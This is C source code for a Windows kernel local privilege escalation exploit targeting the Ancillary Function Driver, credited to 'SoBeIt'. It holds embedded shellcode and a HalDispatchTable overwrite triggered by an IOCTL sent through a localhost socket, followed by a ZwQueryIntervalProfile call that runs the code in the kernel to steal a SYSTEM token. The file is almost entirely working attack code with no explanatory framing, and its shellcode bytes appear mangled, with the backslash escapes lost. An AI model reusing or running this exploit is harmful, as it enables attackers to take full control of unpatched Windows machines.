#include <stdio.h> #include <winsock2.h> #include <windows.h>
#pragma comment(lib, “ws2_32.lib”)
#define NTSTATUS int
typedef struct _PROCESS_BASIC_INFORMATION { NTSTATUS ExitStatus; PVOID PebBaseAddress; ULONG AffinityMask; ULONG BasePriority; ULONG UniqueProcessId; ULONG InheritedFromUniqueProcessId; } PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
typedef struct _IMAGE_FIXUP_ENTRY { USHORT Offset:12; USHORT Type:4; } IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
typedef enum _PROCESS_IMFORMATION_CLASS { ProcessBasicInformation, ProcessQuotaLimits, ProcessIoCounters, ProcessVmCounters, ProcessTimes, ProcessBasePriority, ProcessRaisePriority, ProcessDebugPort, ProcessExceptionPort, ProcessAccessToken, ProcessLdtInformation, ProcessLdtSize, ProcessDeaultHardErrorMode, ProcessIoPortHandlers, ProcessPooledUsageAndLimits, ProcessWorkingSetWatch, ProcessUserModeIOPL, ProcessEnableAlignmentFaultFixup, ProcessPriorityClass, ProcessWx86Information, ProcessHandleCount, ProcessAffinityMask, ProcessPriorityBoost, ProcessDeviceMap, ProcessSessionInformation, ProcessForegroundInformation, ProcessWow64Information } PROCESS_INFORMATION_CLASS;
typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation, SystemProcessorInformation, SystemPerformanceInformation, SystemTimeOfDayInformation, SystemNotImplemented1, SystemProcessesAndThreadsInformation, SystemCallCounts, SystemConfigurationInformation, SystemProcessorTimes, SystemGlobalFlag, SystemNotImplemented2, SystemModuleInformation, SystemLockInformation, SystemNotImplemented3, SystemNotImplemented4, SystemNotImplemented5, SystemHandleInformation, SystemObjectInformation, SystemPagefileInformation, SystemInstructioEmulationCounts, SystemInvalidInfoClass1, SystemCacheInformation, SystemPoolTagInformation, SystemProcessorStatistics, SystemDpcInformation, SystemNotImplemented6, SystemLoadImage, SystemUnloadImage, SystemTimeAdjustment, SystemNotImplemented7, SystemNotImplemented8, SystemNotImplemented9, SystemCrashDumpInformation, SystemExceptionInformation, SystemCrashDumpStateInformation, SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegisterQuotaInformation, SystemLoadAndCallImage, SystemPrioritySeparation } SYSTEM_INFORMATION_CLASS;
typedef enum _KPROFILE_SOURCE { ProfileTime, ProfileAlignmentFixup, ProfileTotalIssues, ProfilePipelineDry, ProfileLoadInstructions, ProfilePipelineFrozen, ProfileBranchInstructions, ProfileTotalNonissues, ProfileDcacheMisses, ProfileIcacheMisses, ProfileCacheMisses, ProfileBranchMispredictions, ProfileStoreInstructions, ProfileFpInstructions, ProfileIntegerInstructions, Profile2Issue, Profile3Issue, Profile4Issue, ProfileSpecialInstructions, ProfileTotalCycles, ProfileIcacheIssues, ProfileDcacheAccesses, ProfileMemoryBarrierCycles, ProfileLoadLinkedIssues, ProfileMaximum } KPROFILE_SOURCE, *PKPROFILE_SOURCE;
typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING;
typedef struct _SECTION_BASIC_INFORMATION { PVOID BaseAddress; ULONG Attributes; LARGE_INTEGER Size; }SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef NTSTATUS (NTAPI *ZWQUERYINTERNALPROFILE)(ULONG, PULONG); typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG); typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG); typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG); typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID); typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOID, ULONG, USHORT, PULONG);
ZWQUERYINTERNALPROFILE ZwQueryIntervalProfile; ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess; ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation; ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory; RTLIMAGENTHEADER RtlImageNtHeader; RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;
unsigned char kfunctions[64][64] = { //ntoskrnl.exe {“ZwTerminateProcess”}, {“PsLookupProcessByProcessId”}, {""}, };
unsigned char shellcode[] = “x90x60x9cxe9xc4x00x00x00x5fx4fx47x66x81x3fx90xcc” “x75xf8x66x81x7fx02xccx90x75xf0x83xc7x04x64x8bx35” “x38x00x00x00xadxadx48x81x38x4dx5ax90x00x75xf7x95” “x8bxf7x6ax02x59xe8x4dx00x00x00xe2xf9x8bx4ex0cxe8” “x29x00x00x00x50x8bx4ex08xe8x20x00x00x00x5ax8bx7e” “x1cx8bx0cx3ax89x0cx38x56x8bx7ex14x8bx4ex18x8bx76” “x10xf3xa4x5ex33xc0x50x50xffx16x9dx61xc3x83xecx04” “x8dx2cx24x55x51xffx56x04x85xc0x0fx85x80x8fx00x00” “x8bx45x00x83xc4x04xc3x51x56x8bx75x3cx8bx74x2ex78” “x03xf5x56x8bx76x20x03xf5x33xc9x49x41xadx03xc5x33” “xdbx0fxbex10x85xd2x74x08xc1xcbx07x03xdax40xebxf1” “x3bx1fx75xe7x5ex8bx5ex24x03xddx66x8bx0cx4bx8bx5e” “x1cx03xddx8bx04x8bx03xc5xabx5ex59xc3xe8x37xffxff” “xffx90x90x90”
“x90xccxccx90x90x90x90x90x90x90x90x90x90x90x90x90” “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90” “x90x90x90x90x90x90x90x90x90x90x90x90xccx90x90xcc”;
void ErrorQuit(pMsg) { printf(“%sError Code:%d ”, pMsg, GetLastError()); ExitProcess(0); }
ULONG ComputeHash(char *ch) { ULONG ret = 0;
while(*ch) { ret = ((ret << 25) | (ret >> 7)) + *ch++; }
return ret; }
void GetFunction() { HANDLE hNtdll;
hNtdll = LoadLibrary(“ntdll.dll”); if(hNtdll == NULL) ErrorQuit(“LoadLibrary failed. ”);
ZwQueryIntervalProfile = (ZWQUERYINTERNALPROFILE)GetProcAddress(hNtdll, “ZwQueryIntervalProfile”); if(ZwQueryIntervalProfile == NULL) ErrorQuit(“GetProcAddress failed. ”);
ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, “ZwQueryInformationProcess”); if(ZwQueryInformationProcess == NULL) ErrorQuit(“GetProcAddress failed. ”);
ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, “ZwQuerySystemInformation”); if(ZwQuerySystemInformation == NULL) ErrorQuit(“GetProcessAddress failed. ”);
ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, “ZwAllocateVirtualMemory”); if(ZwAllocateVirtualMemory == NULL) ErrorQuit(“GetProcAddress failed. ”);
RtlImageNtHeader = (RTLIMAGENTHEADER)GetProcAddress(hNtdll, “RtlImageNtHeader”); if(RtlImageNtHeader == NULL) ErrorQuit(“GetProcAddress failed. ”);
RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)GetProcAddress(hNtdll, “RtlImageDirectoryEntryToData”); if(RtlImageDirectoryEntryToData == NULL) ErrorQuit(“GetProcAddress failed. ”);
FreeLibrary(hNtdll); }
ULONG GetKernelBase(char *KernelName) { ULONG i, Byte, ModuleCount, KernelBase; PVOID pBuffer; PSYSTEM_MODULE_INFORMATION pSystemModuleInformation; PCHAR pName;
ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
if((pBuffer = malloc(Byte)) == NULL) ErrorQuit(“malloc failed. ”);
if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte)) ErrorQuit(“ZwQuerySystemInformation failed ”);
ModuleCount = *(PULONG)pBuffer; pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG)); for(i = 0; i < ModuleCount; i++) { if((pName = strstr(pSystemModuleInformation->ImageName, “ntoskrnl.exe”)) != NULL) { KernelBase = (ULONG)pSystemModuleInformation->Base; printf(“Kernel is %s ”, pSystemModuleInformation->ImageName); free(pBuffer); strcpy(KernelName, “ntoskrnl.exe”);
return KernelBase; }
if((pName = strstr(pSystemModuleInformation->ImageName, “ntkrnlpa.exe”)) != NULL) { KernelBase = (ULONG)pSystemModuleInformation->Base; printf(“Kernel is %s ”, pSystemModuleInformation->ImageName); free(pBuffer); strcpy(KernelName, “ntkrnlpa.exe”);
return KernelBase; }
pSystemModuleInformation++; }
free(pBuffer); return 0; }
ULONG GetServiceTable(PVOID pImageBase, ULONG Address) { PIMAGE_NT_HEADERS pNtHeaders; PIMAGE_BASE_RELOCATION pBaseRelocation; PIMAGE_FIXUP_ENTRY pFixupEntry; ULONG RelocationTableSize = 0; ULONG Offset, i, VirtualAddress, Rva;
Offset = Address - (ULONG)pImageBase; pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase); pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize); if(pBaseRelocation == NULL) return 0;
do { pFixupEntry = (PIMAGE_FIXUP_ENTRY)((ULONG)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
RelocationTableSize = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1; for(i = 0; i < RelocationTableSize; i++, pFixupEntry++) { if(pFixupEntry->Type == IMAGE_REL_BASED_HIGHLOW) { VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset; Rva = *(PULONG)((ULONG)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;
if(Rva == Offset) { if (*(PUSHORT)((ULONG)pImageBase + VirtualAddress - 2) == 0x05c7) return *(PULONG)((ULONG)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase; } } }
*(PULONG)&pBaseRelocation += pBaseRelocation->SizeOfBlock;
} while(pBaseRelocation->VirtualAddress);
return 0; }
int main(int argc, char* argv[]) { PVOID pDrivers[256]; PVOID pOldKernelInfo, pMapAddress = NULL; PULONG pStoreBuffer, pShellcode, pFakeKernelInfo; PUCHAR pRestoreBuffer, pBase, FunctionAddress; PROCESS_BASIC_INFORMATION pbi; SYSTEM_MODULE_INFORMATION smi; SECTION_BASIC_INFORMATION sbi; KPROFILE_SOURCE ProfileSource; OSVERSIONINFO ovi; char DriverName[256], KernelName[64]; ULONG Byte, len, i, j, k, BaseAddress, Value, KernelBase, buf[64]; ULONG HookAddress, SystemId, TokenOffset, Sections, Pid, FunctionNumber; ULONG HDTOffset, AllocationSize; ULONG Result; HANDLE hKernel; WSADATA wsad; int sockfd; struct sockaddr_in saddr;
printf(” MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit ”); printf(” Create by SoBeIt. ”); if(argc != 1) { printf(” Usage:%s ”, argv[0]); return 1; }
pFakeKernelInfo = (PULONG)malloc(256);
GetFunction();
if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL)) ErrorQuit(“ZwQueryInformationProcess failed ”);
KernelBase = GetKernelBase(KernelName); if(!KernelBase) ErrorQuit(“Unable to get kernel base address. ”);
printf(“Kernel base address: %x ”, KernelBase);
ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(!GetVersionEx(&ovi)) ErrorQuit(“GetVersionEx failed. ”);
if(ovi.dwMajorVersion != 5 && ovi.dwMajorVersion != 6) ErrorQuit(“Not Windows NT family OS. ”);
printf(“Major Version:%d Minor Version:%d ”, ovi.dwMajorVersion, ovi.dwMinorVersion); switch(ovi.dwMinorVersion) { case 0: //Windows2000 SystemId = 8; TokenOffset = 0x12c; break;
case 1: //WindowsXP SystemId = 4; TokenOffset = 0xc8; break;
case 2: //Windows2003 SystemId = 4; TokenOffset = 0xd8; break;
default: SystemId = 4; TokenOffset = 0xc8; }
hKernel = LoadLibrary(KernelName); if(hKernel == NULL) ErrorQuit(“LoadLibrary failed. ”);
printf(“Load Base:%x ”, (ULONG)hKernel); HDTOffset = (ULONG)GetProcAddress(hKernel, “HalDispatchTable”); HDTOffset += KernelBase - (ULONG)hKernel; printf(“HalDispatchTable Offset:%x ”, HDTOffset); HookAddress = (ULONG)(HDTOffset + 4); printf(“NtQueryIntervalProfile function entry address:%x ”, HookAddress);
AllocationSize = 0x1000; pStoreBuffer = (PULONG)0x7fb0; if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, &pStoreBuffer, 0, &AllocationSize, MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE)) ErrorQuit(“ZwAllocateVirtualMemory failed. ”);
pRestoreBuffer = malloc(0x100);
memset(pStoreBuffer, 0x90, AllocationSize);
pShellcode = (PULONG)shellcode; for(k = 0; pShellcode[k++] != 0x90cccc90; ) ;
for(j = 0; kfunctions[j][0] != ‘x0’; j++) buf[j] = ComputeHash(kfunctions[j]);
buf[j++] = pbi.InheritedFromUniqueProcessId; buf[j++] = SystemId; buf[j++] = (ULONG)pRestoreBuffer; buf[j++] = HookAddress; buf[j++] = 0x04; buf[j++] = TokenOffset;
memcpy((char *)(pShellcode + k), (char *)buf, j * 4); memcpy((PUCHAR)0x8000, shellcode, sizeof(shellcode) - 1);
if(WSAStartup(MAKEWORD(2, 2), &wsad) != 0) ErrorQuit(“WSAStartup failed. ”);
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) ErrorQuit(“socket failed. ”);
saddr.sin_family = AF_INET; saddr.sin_port = htons(0x1bd); saddr.sin_addr.s_addr = 0x100007f;
if(connect(sockfd, (struct sockaddr *)&saddr, sizeof(struct sockaddr))) ErrorQuit(“connect failed. ”);
DeviceIoControl((HANDLE)sockfd, 0x1203F, NULL, 0, (PVOID)(HookAddress - 3), 0, &Result, NULL);
ProfileSource = ProfileTotalIssues; ZwQueryIntervalProfile(ProfileSource, &Result);
printf(“Exploit finished. ”); return 1; }
作者:SoBeIt